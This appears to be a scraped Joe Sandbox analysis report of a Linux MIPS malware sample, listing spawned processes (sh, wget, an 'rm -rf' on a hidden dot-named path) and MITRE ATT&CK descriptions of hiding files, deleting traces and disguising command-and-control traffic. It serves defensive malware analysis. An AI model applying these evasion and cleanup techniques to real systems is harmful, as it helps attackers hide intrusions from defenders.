Arguments:	/bin/sh ./.....
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5514, Parent PID: 5495

General

Start time (UTC):	05:44:13
Start date (UTC):	10/05/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: rm PID: 5514, Parent PID: 5495

General

Start time (UTC):	05:44:13
Start date (UTC):	10/05/2025
Path:	/usr/bin/rm
Arguments:	rm -rf .....
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Chronological Activities

Analysis Process: mipsel.elf PID: 5497, Parent PID: 5493

General

Start time (UTC):	05:44:12
Start date (UTC):	10/05/2025
Path:	/tmp/mipsel.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Chronological Activities

Analysis Process: mipsel.elf PID: 5499, Parent PID: 5493

General

Start time (UTC):	05:44:12
Start date (UTC):	10/05/2025
Path:	/tmp/mipsel.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Chronological Activities

Analysis Process: mipsel.elf PID: 5501, Parent PID: 5499

General

Start time (UTC):	05:44:12
Start date (UTC):	10/05/2025
Path:	/tmp/mipsel.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.
Tactics:	Defense Evasion
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Creation, File: File Metadata, File: File Modification, Firmware: Firmware Modification, Process: OS API Execution, Process: Process Creation, Script: Script Execution, Service: Service Creation, User Account: User Account Creation, User Account: User Account Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obfuscate command and control traffic to make it more difficult to detect. Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report mipsel.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Symbols

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

System Behavior

Analysis Process: mipsel.elf PID: 5493, Parent PID: 5410

General

Chronological Activities

Analysis Process: mipsel.elf PID: 5495, Parent PID: 5493

General

Chronological Activities

Analysis Process: sh PID: 5495, Parent PID: 5493

General

Chronological Activities

Analysis Process: sh PID: 5510, Parent PID: 5495

General

Chronological Activities

Analysis Process: wget PID: 5510, Parent PID: 5495

Linux Analysis Report
mipsel.elf